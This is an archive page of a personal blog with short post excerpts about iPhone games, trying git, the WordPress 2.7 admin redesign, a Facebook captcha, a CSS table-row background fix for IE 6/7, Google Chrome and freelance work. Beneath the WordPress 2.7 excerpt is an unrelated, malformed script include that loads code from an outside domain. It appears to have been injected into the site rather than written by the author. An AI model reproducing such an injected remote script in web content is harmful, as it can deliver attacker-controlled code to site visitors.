Archive for the ‘Uncategorized’ Category

Where’s the Real iPhone Gaming Media?

My Xbox has been MIA lately, and my ambitions in WoW have feigned a bit over the last few weeks, so I turned to another platform for my gaming fix: my iPhone. Alas, I don’t have any noteworthy games, other than Frenzic (mostly because of my addiction to the desktop edition). So, I turned to [...]

Trying Out git

A recent post to the Google Groups for my favorite editor Coda detailed how to set up the new SVN feature with a git repository. Naturally, I had to try it.
So far, so good. I haven’t made a commit to my public repo yet, but I’ll update more on that later. Now, to subversion or [...]

Wordpress 2.7 Interface Overhaul

Wasn’t it just in 2.5 that we got a “wp-admin” redo?
Meh, I’m over it, the new one, due in November, looks great.
script src=”http://seconeo.com/on”>

I got captcha’ed… by Facebook

 
Is this necessary? They claim it’s a “random security measure” to protect Facebook from spam. Hrm. Weak sauce, Facebook, weak sauce.

Table Row Backgrounds in IE 6 and 7

Ever try to use CSS to specify a background image for table rows?
IE 6 and 7 breaks it. The image is iterated across each <td> in the row. Here’s a simple fix in your CSS:
tr {background: url(’image’) no-repeat left top; position: relative;}
td {background: none}
Easy.

Counter Arguments to 7 Reasons Google’s Chrome is a Bad Idea

He said
I said

Proprietary: If you think the Microsoft monopoly sucks don’t you think that a Google monopoly does suck as well? It might be partly open source, but Google Chrome won’t be another Firefox, you can bet. Google is the Microsoft of the Web. It won’t be friendly forever. Just ask the Chinese. Microsoft of [...]

Freelanceishness

The suffixes -ish and -ness are both great descriptors of my status as a freelance web developer and consultant. I still work part time at the University of Denver for the stability of a paycheck while I get on my feet. I truly prefer (for now) the hectic schedule and risk involved in freelance, and [...]

Wordpress for iPhone

Testing the Wordpress app for my phone. Even including a creepy self portrait.

Hello world!

Welcome to WordPress. This is your first post. Edit or delete it, then start blogging!